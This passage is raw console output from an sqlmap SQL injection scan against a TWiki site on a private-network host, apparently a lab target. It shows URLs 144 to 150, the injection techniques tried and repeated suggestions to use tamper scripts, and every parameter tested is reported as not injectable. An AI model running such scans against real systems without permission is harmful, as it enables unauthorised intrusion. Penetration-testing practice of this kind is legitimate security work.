[19:54:08] [WARNING] GET parameter 't' does not appear dynamic | |
[19:54:08] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[19:54:08] [INFO] testing for SQL injection on GET parameter 't' | |
[19:54:08] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:54:09] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:54:10] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:54:10] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:54:11] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:54:11] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:54:11] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:54:12] [INFO] testing 'MySQL inline queries' | |
[19:54:12] [INFO] testing 'PostgreSQL inline queries' | |
[19:54:12] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:54:12] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:54:12] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:54:13] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:54:13] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:54:13] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:54:14] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:54:14] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:54:15] [INFO] testing 'Oracle AND time-based blind' | |
[19:54:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:54:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:54:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:54:27] [WARNING] GET parameter 't' is not injectable | |
[19:54:27] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 144: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Starting *Points[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:54:27] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Starting *Points[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:54:27] [INFO] testing connection to the target URL | |
[19:54:27] [INFO] testing if the target URL is stable | |
[19:54:28] [INFO] target URL is stable | |
[19:54:28] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:54:28] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:54:28] [INFO] URI parameter '#1*' is dynamic | |
[19:54:28] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:54:28] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:54:28] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:54:28] [WARNING] reflective value(s) found and filtering out | |
[19:54:30] [INFO] URI parameter '#1*' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable | |
[19:54:30] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:54:30] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:54:30] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:54:30] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:54:30] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:54:30] [INFO] testing 'MySQL inline queries' | |
[19:54:30] [INFO] testing 'PostgreSQL inline queries' | |
[19:54:30] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:54:30] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:54:30] [WARNING] time-based comparison requires larger statistical model, please wait..... | |
[19:54:31] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:54:31] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:54:31] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:54:31] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:54:31] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:54:31] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:54:31] [INFO] testing 'Oracle AND time-based blind' | |
[19:54:32] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns' | |
[19:54:32] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:54:32] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found | |
[19:54:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns' | |
[19:54:35] [INFO] checking if the injection point on URI parameter '#1*' is a false positive | |
[19:54:35] [WARNING] false positive or unexploitable injection point detected | |
[19:54:35] [WARNING] URI parameter '#1*' is not injectable | |
[19:54:35] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 145: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/StartingPoints?skin=print | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:54:35] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/StartingPoints?skin=print' | |
[19:54:35] [INFO] testing connection to the target URL | |
[19:54:35] [INFO] testing if the target URL is stable | |
[19:54:36] [INFO] target URL is stable | |
[19:54:36] [INFO] testing if GET parameter 'skin' is dynamic | |
[19:54:36] [INFO] confirming that GET parameter 'skin' is dynamic | |
[19:54:36] [INFO] GET parameter 'skin' is dynamic | |
[19:54:36] [INFO] heuristics detected web page charset 'ascii' | |
[19:54:36] [WARNING] heuristic (basic) test shows that GET parameter 'skin' might not be injectable | |
[19:54:37] [INFO] testing for SQL injection on GET parameter 'skin' | |
[19:54:37] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:54:37] [WARNING] reflective value(s) found and filtering out | |
[19:54:38] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:54:38] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:54:38] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:54:39] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:54:39] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:54:40] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:54:40] [INFO] testing 'MySQL inline queries' | |
[19:54:40] [INFO] testing 'PostgreSQL inline queries' | |
[19:54:40] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:54:40] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:54:41] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:54:41] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:54:41] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:54:42] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:54:42] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:54:43] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:54:43] [INFO] testing 'Oracle AND time-based blind' | |
[19:54:44] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:54:44] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:54:49] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:54:54] [WARNING] GET parameter 'skin' is not injectable | |
[19:54:54] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 146: | |
GET http://192.168.1.113:80/twiki/bin/rdiff/TWiki/StartingPoints?rev1=1.4&rev2=1.3 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:54:54] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/StartingPoints?rev1=1.4&rev2=1.3' | |
[19:54:54] [INFO] testing connection to the target URL | |
[19:54:55] [INFO] testing if the target URL is stable | |
[19:54:56] [INFO] target URL is stable | |
[19:54:56] [INFO] testing if GET parameter 'rev1' is dynamic | |
[19:54:56] [WARNING] GET parameter 'rev1' does not appear dynamic | |
[19:54:56] [WARNING] heuristic (basic) test shows that GET parameter 'rev1' might not be injectable | |
[19:54:56] [INFO] heuristic (XSS) test shows that GET parameter 'rev1' might be vulnerable to XSS attacks | |
[19:54:56] [INFO] testing for SQL injection on GET parameter 'rev1' | |
[19:54:56] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:54:56] [WARNING] reflective value(s) found and filtering out | |
[19:54:57] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:54:57] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:54:58] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:54:58] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:54:59] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:55:00] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:55:00] [INFO] testing 'MySQL inline queries' | |
[19:55:00] [INFO] testing 'PostgreSQL inline queries' | |
[19:55:00] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:55:00] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:55:00] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:55:01] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:55:01] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:55:02] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:55:02] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:55:03] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:55:03] [INFO] testing 'Oracle AND time-based blind' | |
[19:55:04] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:55:04] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:55:10] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:55:16] [WARNING] GET parameter 'rev1' is not injectable | |
[19:55:16] [INFO] testing if GET parameter 'rev2' is dynamic | |
[19:55:16] [INFO] confirming that GET parameter 'rev2' is dynamic | |
[19:55:16] [INFO] GET parameter 'rev2' is dynamic | |
[19:55:16] [WARNING] heuristic (basic) test shows that GET parameter 'rev2' might not be injectable | |
[19:55:16] [INFO] heuristic (XSS) test shows that GET parameter 'rev2' might be vulnerable to XSS attacks | |
[19:55:16] [INFO] testing for SQL injection on GET parameter 'rev2' | |
[19:55:17] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:55:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:55:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:55:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:55:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:55:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:55:20] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:55:20] [INFO] testing 'MySQL inline queries' | |
[19:55:20] [INFO] testing 'PostgreSQL inline queries' | |
[19:55:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:55:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:55:21] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:55:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:55:22] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:55:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:55:23] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:55:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:55:24] [INFO] testing 'Oracle AND time-based blind' | |
[19:55:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:55:31] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:55:38] [WARNING] GET parameter 'rev2' is not injectable | |
[19:55:38] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 147: | |
GET http://192.168.1.113:80/twiki/bin/view/TWiki/StartingPoints?rev=1.3 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:55:38] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/view/TWiki/StartingPoints?rev=1.3' | |
[19:55:38] [INFO] testing connection to the target URL | |
[19:55:38] [INFO] testing if the target URL is stable | |
[19:55:39] [INFO] target URL is stable | |
[19:55:39] [INFO] testing if GET parameter 'rev' is dynamic | |
[19:55:39] [WARNING] GET parameter 'rev' does not appear dynamic | |
[19:55:39] [WARNING] heuristic (basic) test shows that GET parameter 'rev' might not be injectable | |
[19:55:39] [INFO] heuristic (XSS) test shows that GET parameter 'rev' might be vulnerable to XSS attacks | |
[19:55:39] [INFO] testing for SQL injection on GET parameter 'rev' | |
[19:55:39] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:55:39] [WARNING] reflective value(s) found and filtering out | |
[19:55:40] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:55:40] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:55:41] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:55:42] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:55:42] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:55:43] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:55:43] [INFO] testing 'MySQL inline queries' | |
[19:55:43] [INFO] testing 'PostgreSQL inline queries' | |
[19:55:43] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:55:43] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:55:44] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:55:44] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:55:44] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:55:45] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:55:45] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:55:46] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:55:46] [INFO] testing 'Oracle AND time-based blind' | |
[19:55:47] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:55:47] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:55:53] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:55:59] [WARNING] GET parameter 'rev' is not injectable | |
[19:55:59] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:55:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/rdiff/TWiki/StartingPoints?rev1=1.3&rev2=1.2' | |
[19:55:59] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/view/TWiki/StartingPoints?rev=1.2' | |
URL 148: | |
GET http://192.168.1.113:80/twiki/bin/oops/TWiki/StartingPoints?template=oopsmore¶m1=1.4¶m2=1.4 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:55:59] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/oops/TWiki/StartingPoints?template=oopsmore¶m1=1.4¶m2=1.4' | |
[19:55:59] [INFO] testing connection to the target URL | |
[19:55:59] [INFO] testing if the target URL is stable | |
[19:56:00] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on | |
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C | |
[19:56:00] [INFO] testing if GET parameter 'template' is dynamic | |
[19:56:00] [INFO] confirming that GET parameter 'template' is dynamic | |
[19:56:00] [INFO] GET parameter 'template' is dynamic | |
[19:56:00] [INFO] heuristics detected web page charset 'ascii' | |
[19:56:00] [WARNING] heuristic (basic) test shows that GET parameter 'template' might not be injectable | |
[19:56:00] [INFO] heuristic (XSS) test shows that GET parameter 'template' might be vulnerable to XSS attacks | |
[19:56:00] [INFO] testing for SQL injection on GET parameter 'template' | |
[19:56:01] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:56:01] [WARNING] reflective value(s) found and filtering out | |
[19:56:01] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:56:02] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:56:02] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:56:02] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:56:03] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:56:03] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:56:03] [INFO] testing 'MySQL inline queries' | |
[19:56:03] [INFO] testing 'PostgreSQL inline queries' | |
[19:56:04] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:56:04] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:56:04] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:56:04] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:56:05] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:56:05] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:56:06] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:56:06] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:56:06] [INFO] testing 'Oracle AND time-based blind' | |
[19:56:07] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:56:07] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:56:11] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:56:16] [WARNING] GET parameter 'template' is not injectable | |
[19:56:16] [INFO] testing if GET parameter 'param1' is dynamic | |
[19:56:16] [WARNING] GET parameter 'param1' does not appear dynamic | |
[19:56:16] [WARNING] heuristic (basic) test shows that GET parameter 'param1' might not be injectable | |
[19:56:16] [INFO] heuristic (XSS) test shows that GET parameter 'param1' might be vulnerable to XSS attacks | |
[19:56:16] [INFO] testing for SQL injection on GET parameter 'param1' | |
[19:56:16] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:56:18] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:56:18] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:56:19] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:56:19] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:56:20] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:56:21] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:56:21] [INFO] testing 'MySQL inline queries' | |
[19:56:21] [INFO] testing 'PostgreSQL inline queries' | |
[19:56:21] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:56:21] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:56:22] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:56:22] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:56:23] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:56:23] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:56:24] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:56:24] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:56:25] [INFO] testing 'Oracle AND time-based blind' | |
[19:56:25] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:56:33] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:56:40] [WARNING] GET parameter 'param1' is not injectable | |
[19:56:40] [INFO] testing if GET parameter 'param2' is dynamic | |
[19:56:40] [WARNING] GET parameter 'param2' does not appear dynamic | |
[19:56:40] [WARNING] heuristic (basic) test shows that GET parameter 'param2' might not be injectable | |
[19:56:40] [INFO] testing for SQL injection on GET parameter 'param2' | |
[19:56:41] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:56:42] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:56:42] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:56:43] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:56:43] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:56:44] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:56:45] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:56:45] [INFO] testing 'MySQL inline queries' | |
[19:56:45] [INFO] testing 'PostgreSQL inline queries' | |
[19:56:45] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:56:45] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:56:46] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:56:46] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:56:47] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:56:47] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:56:48] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:56:48] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:56:49] [INFO] testing 'Oracle AND time-based blind' | |
[19:56:49] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:56:57] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:57:04] [WARNING] GET parameter 'param2' is not injectable | |
[19:57:04] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
[19:57:04] [INFO] skipping 'http://192.168.1.113:80/twiki/bin/edit/TWiki/NotExistingYet?topicparent=TWiki.TextFormattingRules' | |
URL 149: | |
GET http://192.168.1.113:80/twiki/bin/edit/TWiki/TextFormattingRules?t=1441457582 | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:57:04] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/edit/TWiki/TextFormattingRules?t=1441457582' | |
[19:57:04] [INFO] testing connection to the target URL | |
[19:57:05] [INFO] testing if the target URL is stable | |
[19:57:05] [INFO] target URL is stable | |
[19:57:05] [INFO] testing if GET parameter 't' is dynamic | |
[19:57:06] [WARNING] GET parameter 't' does not appear dynamic | |
[19:57:06] [WARNING] heuristic (basic) test shows that GET parameter 't' might not be injectable | |
[19:57:06] [INFO] testing for SQL injection on GET parameter 't' | |
[19:57:06] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:57:07] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:57:07] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
[19:57:08] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause' | |
[19:57:09] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause' | |
[19:57:09] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)' | |
[19:57:10] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace' | |
[19:57:10] [INFO] testing 'MySQL inline queries' | |
[19:57:10] [INFO] testing 'PostgreSQL inline queries' | |
[19:57:10] [INFO] testing 'Microsoft SQL Server/Sybase inline queries' | |
[19:57:10] [INFO] testing 'MySQL > 5.0.11 stacked queries (SELECT - comment)' | |
[19:57:11] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)' | |
[19:57:11] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)' | |
[19:57:12] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)' | |
[19:57:12] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)' | |
[19:57:13] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind' | |
[19:57:13] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind' | |
[19:57:14] [INFO] testing 'Oracle AND time-based blind' | |
[19:57:15] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns' | |
[19:57:15] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS. You can try to explicitly set it using option '--dbms' | |
[19:57:21] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns' | |
[19:57:28] [WARNING] GET parameter 't' is not injectable | |
[19:57:28] [ERROR] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp') If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment'), skipping to the next URL | |
URL 150: | |
GET http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Text *Formatting *Rules[^A-Za-z] | |
do you want to test this URL? [Y/n/q] | |
> Y | |
[19:57:28] [INFO] testing URL 'http://192.168.1.113:80/twiki/bin/search/TWiki/SearchResult?scope=text®ex=on&search=Text *Formatting *Rules[^A-Za-z]' | |
custom injection marking character ('*') found in option '-u'. Do you want to process it? [Y/n/q] Y | |
[19:57:28] [INFO] testing connection to the target URL | |
[19:57:28] [INFO] testing if the target URL is stable | |
[19:57:29] [INFO] target URL is stable | |
[19:57:29] [INFO] testing if URI parameter '#1*' is dynamic | |
[19:57:29] [INFO] confirming that URI parameter '#1*' is dynamic | |
[19:57:29] [INFO] URI parameter '#1*' is dynamic | |
[19:57:30] [WARNING] heuristic (basic) test shows that URI parameter '#1*' might not be injectable | |
[19:57:30] [INFO] testing for SQL injection on URI parameter '#1*' | |
[19:57:30] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause' | |
[19:57:30] [WARNING] reflective value(s) found and filtering out | |
[19:57:31] [INFO] testing 'MySQL >= 5.0 boolean-based blind - Parameter replace' | |
[19:57:31] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause' | |
